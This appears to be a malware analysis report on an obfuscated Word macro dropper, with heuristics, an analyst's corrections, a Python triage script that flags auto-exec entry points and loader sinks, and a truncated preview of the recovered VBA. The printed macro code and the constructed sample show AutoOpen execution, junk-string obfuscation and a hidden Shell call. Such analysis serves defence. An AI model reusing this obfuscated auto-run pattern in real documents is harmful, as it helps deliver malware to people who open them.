Verdict: MALICIOUS
Risk Score: 202

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution

Note on the mapping: T1203 covers code execution through a software vulnerability. Nothing on this page evidences an exploit; every finding below is about VBA macro execution, which only happens after the user opens the file and enables content, so T1204.002 User Execution: Malicious File is the more accurate technique for what this sample actually does.
The sample is a malicious Office (OLE) Word document carrying a VBA project. The project defines an AutoOpen procedure, so the macro runs as soon as the document is opened with macros enabled, and it contains a Shell() call, a direct code-execution sink. The recovered source is heavily obfuscated: long chains of MidB/Left/Right/Mid over variables that are never assigned anywhere in the preview (so they evaluate to empty strings and act as junk), with the real payload split into short string literals that are concatenated at run time. One visible fragment, `"d \\ / / " + "//\ /V:O/C" + """" + "set {+@?="`, is consistent with a cmd.exe command line that uses the /V:ON delayed-expansion switch and `set` statements to assemble an obfuscated command. That makes a second-stage download-and-execute the likely next step, although the Shell() call itself and the final command string lie beyond the truncated preview and were not recovered here. The ClamAV detection corroborates the heuristic verdict.
Heuristics (6)

- ClamAV: Doc.Malware.Valyria-6698777-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Valyria-6698777-0
- VBA macros detected [medium, OLE_VBA_MACROS, 2 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the "no modern VBA project was recovered" wording is the heuristic's generic description and does not hold: a VBA project was recovered (macros.bas below), and the marker is the same AutoOpen name already flagged by OLE_VBA_AUTOOPEN, so this finding adds no independent evidence.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier that Office writes into its own files, not a network indicator; do not block, hunt or pivot on it.
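The two macro findings above (AutoOpen entry point plus a Shell() sink) and the string-splitting obfuscation visible in the preview are straightforward to triage from the decoded VBA source. The script below is an added example, not the analyzer's own code: it locates auto-execution entry points, flags common execution and loader sinks, counts the MidB/Left/Right junk calls, and folds adjacent string literals joined by `+` or `&` so that split command fragments become readable. The embedded VBA sample is constructed for the example; it copies the page's visible pattern (including the `ANCXb` line from the preview) and adds an assumed `Shell` sink that the truncated preview does not show.

```python
import re

# Constructed sample (not the page's macros.bas). It mimics the recovered code: an
# AutoOpen entry point, junk MidB/Left/Right chains over variables that are never
# assigned, a command string split into literal fragments (the ANCXb line is the one
# visible in the preview), and an ASSUMED Shell sink the truncated preview lacks.
SAMPLE_VBA = r'''
Attribute VB_Name = "FbANqwokLfh"
Sub AutoOpen()
    Dim KdwSvi(2)
    KdwSvi(0) = MidB(KzIjf + KjlmBRLbz + CtRiRp, 878, 790) + Left(kUlAh + jwYkRR, 811)
    lMYOiLwkBTJUC (sCPlUZzil + QidQJOi)
End Sub
Function sCPlUZzil()
    ANCXb = "d \\ / / " + "//\ /V:O/C" + """" + "set {+@?=" + "7a02 a207 0a72 20" + "7a 27a0 a0"
    Dim qjaoM(2)
    qjaoM(0) = MidB(NDvpBTKh + PshrkfsifJX, 387, 897) + Right(JZwTGWvw + jIDXnv, 373)
    sCPlUZzil = ANCXb
End Function
Sub lMYOiLwkBTJUC(payload)
    Shell payload, vbHide
End Sub
'''

# Procedures Office runs without a click (Word, Excel and legacy names).
AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "AutoExit", "AutoNew",
            "Document_Open", "Document_Close", "Workbook_Open", "Workbook_Close",
            "Auto_Open", "Auto_Close")
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(" + "|".join(AUTOEXEC) + r")\b",
    re.IGNORECASE | re.MULTILINE)

# Execution and loader sinks worth flagging; a starting list, not an exhaustive one.
SUSPICIOUS = {
    "Shell": r"\bShell\b",
    "CreateObject": r"\bCreateObject\b",
    "WScript.Shell": r"WScript\.Shell",
    "Environ": r"\bEnviron\b",
    "URLDownloadToFile": r"URLDownloadToFile",
    "XMLHTTP": r"XMLHTTP",
    "ADODB.Stream": r"ADODB\.Stream",
    "CallByName": r"\bCallByName\b",
}

# String-slicing builtins that this sample uses as junk around the real strings.
SLICE_RE = re.compile(r"\b(?:MidB?|LeftB?|RightB?)\s*\(", re.IGNORECASE)

# A VBA string literal; an embedded quote is written as "". A chain is literals joined by + or &.
STRING_LIT = r'"(?:[^"\n]|"")*"'
LIT_RE = re.compile(STRING_LIT)
CHAIN_RE = re.compile(STRING_LIT + r"(?:\s*[+&]\s*" + STRING_LIT + r")+")


def find_autoexec(src):
    """Auto-execution entry points, in order of first appearance."""
    seen = []
    for m in AUTOEXEC_RE.finditer(src):
        if m.group(1) not in seen:
            seen.append(m.group(1))
    return seen


def find_suspicious_calls(src):
    return sorted(name for name, pat in SUSPICIOUS.items() if re.search(pat, src))


def slice_call_count(src):
    return len(SLICE_RE.findall(src))


def fold_literals(src, min_len=8):
    """Join adjacent literals ("a" + "b" & "c") so a split command line reads as one string."""
    out = []
    for m in CHAIN_RE.finditer(src):
        parts = [lit[1:-1].replace('""', '"') for lit in LIT_RE.findall(m.group(0))]
        joined = "".join(parts)
        if len(joined) >= min_len:
            out.append(joined)
    return out


def triage(src):
    autoexec = find_autoexec(src)
    calls = find_suspicious_calls(src)
    strings = fold_literals(src)
    # "/V:O" is the start of cmd.exe's /V:ON (delayed expansion) switch; finding it inside a
    # concatenated literal is a strong hint that the macro is building a cmd.exe command line.
    hints = [s for s in strings if "/V:O" in s or "powershell" in s.lower()]
    if autoexec and calls:
        verdict = "malicious"
    elif autoexec or calls or hints:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"autoexec": autoexec, "calls": calls, "slice_calls": slice_call_count(src),
            "recovered_strings": strings, "command_hints": hints, "verdict": verdict}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

Feed it the decoded VBA source that olevba (the extractor the report used) writes out, rather than the raw OLE file. The literal folding only recovers fragments that are concatenated in place; strings assembled through variables, `Chr()` calls or the junk slicing functions still need a deobfuscator or a run in an instrumented VBA emulator.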
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 105711 bytes | a76d5205b310b11b298635a73e0e194fdaad6edf0538249b2b5a72ca3275d3c1 |

Preview script: first 1,000 lines of the extracted script (the preview below is cut off well before that)
Attribute VB_Name = "FbANqwokLfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim KdwSvi(2)
KdwSvi(0) = MidB(KzIjf + KjlmBRLbzWwrfoACo + CtRiRp, 878, 790) + MidB(EEhsZk + IRWSZjjSSUjcRjsVSzMR + FtdkzGDB, 763, 613)
KdwSvi(1) = Left(kUlAh + VdonUvLPfOvAjdEzTMQip + jwYkRR, 811) + Left(LRGIpn + WYkMSGAziCPEzzBwIfNzFK + CfvJjm, 538) + MidB(BKQqYl + naNLREKYQJJbfCzTAZWccr + nvYku, 841, 271) + Mid(EHkakjH + woWIPCRUJRwkTWizjO + NSwjMs, 310, 860)
Dim Jsuif(2)
Jsuif(0) = Left(JcWEAl + CWNwIpDhIpTWNZEraaoZ + dWmuJ, 241) + Right(tKVCuGQ + TVqLzDSnwttMNviTRnR + rcCDC, 431)
Jsuif(1) = Right(UPUDBri + cWOnihwfzcwoYhUXtAP + SYwst, 410) + Right(tiLuh + vFiWWijqSiUjiMFM + kEfKv, 541)
Dim WPtPwC(2)
WPtPwC(0) = MidB(pktpV + OnQuUQiohraofFjbt + NtRzKw, 917, 685) + Left(jfJvlRoL + EiHcfuAnIuGoXdVNRm + tqDDsuo, 852)
WPtPwC(1) = Right(jSfmoUPw + rDdrQVOnwpuwBNqIKzQiT + tlpBzTv, 179) + Right(MMmWfAZR + TiYBrZpwbYKjqcSAWwpMXZ + lfwrM, 411) + Mid(PMnJY + MNRCdwCCGQbmdRcVEAwkM + jMPKJ, 540, 859) + Mid(zFXmHqc + vtjdwLLDZPNcFMimszoi + SvEpN, 262, 474)
lMYOiLwkBTJUC (KeyString(HrLKbn + thnsGaPB + 14 + 21 + 32 + MAwpUAAL + LbrbbdLm) + ftMSL + QidQJOi + KeyString(OSWKJ + XhSpLQc + 17 + 24 + 36 + sTOSojd + jhYiCM) + sCPlUZzil + JiaBZjbdA + zsTTDEjCG + tMofYiIjkE + jCYvCvjtoRN + omrqjDd + vdGOEw + TTPWAK)
Dim IpCnHL(1)
IpCnHL(0) = Right(fPGrqLq + oRnHUitQPklvvTFjAMJ + diosliId, 84) + Right(thnoG + qwvqjUWXGGKhqdluBj + HhBkB, 734) + Left(druSoB + UjOLBWuiLrJCLHioJijKkrp + UNtoqm, 506) + Right(WFknXF + VORkMJzNQkViTMsRSDTQ + NmjDWLi, 409)
Dim aMhIE(1)
aMhIE(0) = Left(NVpzrCs + NnXrCfwzWPJHFowlju + XcFuvl, 431) + MidB(KKzqzwSc + JhiRGQjCEGMRLZzEkMcnYzw + CpfJzL, 852, 623)
Dim lqWIft(2)
lqWIft(0) = MidB(iwKbTjdi + ozCwTYVASDENJqXwCVE + iaZSEDnh, 246, 324) + Mid(lpWzjKsV + iBXGqGkDkqKSJQziVrzh + AABWLLn, 911, 3)
lqWIft(1) = MidB(uwMhzK + CaWdzWtvbmlTMipFsYDPSAb + kzXjjr, 167, 32) + Mid(DzRQwU + EhUWbfVRwKEHbKtDF + EcLjfja, 151, 128) + MidB(uXhwN + BOZKqtisqGDFbdrL + zuKsPzi, 961, 493) + Mid(YtDmCull + nkBDivovGCcaCRaaKjS + fXFSZ, 682, 116)
Dim zdMmT(2)
zdMmT(0) = Mid(wtlRwjV + WjtGRJITNZzMGTtGaXaJJoAD + EGJlDoLm, 738, 866) + Right(soGEml + XriXwYXkSRFmVtMJRHGU + EfmCE, 28)
zdMmT(1) = MidB(EaMblm + oCUbkjWupacUKRWTtJUjQCoh + iiZiYTE, 1, 684) + Left(IrDPam + JqIVtlkTDZvBbNBzwrM + tYkRQRp, 309)
End Sub
Attribute VB_Name = "lLKIplE"
Function sCPlUZzil()
ANCXb = "d \\ / / " + "//\ /V:O/C" + """" + "set {+@?=" + "7a02 a207 0a72 20" + "7a 27a0 a0"
Dim qjaoM(2)
qjaoM(0) = MidB(NDvpBTKh + PshrkfsifJXCGhCqmc + lMUfWAO, 387, 897) + MidB(JZwTGWvw + jIDXnvHraiYNwhJrQLO + NcHOv, 373, 835)
qjaoM(1) = Left(ICDQI + cMDIKLCnqpmEUmzJK + LXiCPF, 878) + MidB(ZZmnwLNv + EbFdFbwiQTwZQGaIVFIMr + SiMJZ, 25, 638)
Dim vGudbY(2)
vGudbY(0) = Left(KfaAW + fnnGLvONsINkYqjjKulw + zzBMpLww, 288) + Left(Oahojsj + KYmUMJpWDuqFwNBXhM + vEEqzr, 574)
vGudbY(1) = MidB(LPnZK + frGaLiwITqSrIDDrPITVzs + iqVonjBs, 800, 116) + Right(MIvZj + JvIJsTRrMWIsRSvi + qQNzDti, 144) + MidB(owhsuWhd + PJfTzJUqddCSiuJpc + fShMz, 317, 957) + Right(SLiWjlu + tKQiQmzJPbXoqfMlkKjWv + qQBmt, 992)
Dim kpKHG(2)
kpKHG(0) = Left(kZKIjwzm + oTjLXpJmAwDPZLwJwLKEG + GWLDN, 598) + MidB(azpNQiv + LAhJlwkzcDfiPcjnbjn + kwOGl, 150, 537)
kpKHG(1) = Mid(WsFjBVZb + CmAwhNQEIsEYhUYnLQADnHX + KONAdw, 309, 503) + Right(jtVDd + RTXLdhszYCjNoKqzurbZRuo + kqNXK, 757) + MidB(wEhjV + aNqXMWCKswHpupwrMEL + ZwHrvM, 93, 469) + Mid(zEDQYiiU + MfAJsmririPiSzLZznZT + BNYXMdjI, 997, 236)
Dim QSIzH(2)
QSIzH(0) = MidB(KEVsGh + MskdSHWjfHlLjQwwKbi + zzfUL, 980, 820) + Right(rDibJW + HYTAnLadcIkHLildcCzkph + jvFGct, 323)
QSIzH(1) = Left(mGLlE + WipKfVzfAarHoirthkWf + sczXSjXL, 575) + Mid(sIoLD + bSZLRInuLJlADzTtaNRCjda + LChicvD, 489, 339)
Dim zwIUVt(2)
zwIUVt(0) = MidB(kVlSKP + ErmMEOqZMSNuHiQRMQd + WjKjbGN, 949, 138) + Right(IZhtj + CIbjVdnOtwKibZXEKzMwUG +
... (truncated)